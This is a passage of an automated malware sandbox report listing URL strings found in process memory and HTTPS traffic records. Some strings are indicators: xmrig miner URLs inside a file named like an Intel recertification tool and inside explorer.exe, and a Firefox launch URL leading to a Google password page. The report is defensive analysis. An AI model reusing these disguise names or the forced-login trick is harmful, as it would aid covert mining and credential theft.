Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/This
Source: firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E01D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2965979540.000001EB3DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB39657000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000034.00000003.2847668422.000001EB3DDEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsList
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB3646B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2937567313.000001EB36C47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37684000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000034.00000002.2937567313.000001EB36CBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E049000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB36997000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3691E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E0FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2983612498.0000210E81F04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000034.00000003.2853488490.000001EB36B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2854343934.000001EB36BA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: firefox.exe, 00000034.00000002.2937567313.000001EB36CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: 847ee125a0.exe, 00000024.00000003.2677970590.0000000005612000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2848165418.00000000057DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB3648E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000034.00000002.2937567313.000001EB36CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarResult.sys.mjsurlbar-result-menu-dismi
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB3155F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: 847ee125a0.exe, 00000024.00000003.2677970590.0000000005612000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2848165418.00000000057DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgnsCookieBannerService
Source: firefox.exe, 00000034.00000002.2953557870.000001EB39184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2965979540.000001EB3DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/processPendingFileChanges/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2943876866.000001EB37903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000034.00000002.2984553578.0000288840A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2940906463.000001EB37003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000034.00000002.2965979540.000001EB3DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2566801065.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2566801065.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2566801065.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: firefox.exe, 00000034.00000002.2981779926.000018DAC0004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000034.00000002.2953557870.000001EB391FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947637742.000001EB380D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000034.00000002.2955908443.000001EB392D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2948502881.000001EB3810A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2955908443.000001EB392FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2953557870.000001EB39157000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2910860360.000001EB25D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947637742.000001EB380D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB36419000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2944927842.000001EB37B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33D3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2910549471.000001EB25B40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000032.00000002.2776828066.0000024631941000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000002.2785298637.000002C03F66F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2910395906.000001EB259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000034.00000002.2910395906.000001EB259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd?
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdBoolean
Source: firefox.exe, 00000034.00000002.2910395906.000001EB259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdJ
Source: firefox.exe, 00000034.00000002.2911792267.000001EB27A04000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2911792267.000001EB279C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMozElements.MozEleme
Source: firefox.exe, 00000034.00000002.2910860360.000001EB25D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttps://crash-report
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountget
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49845 version: TLS 1.2
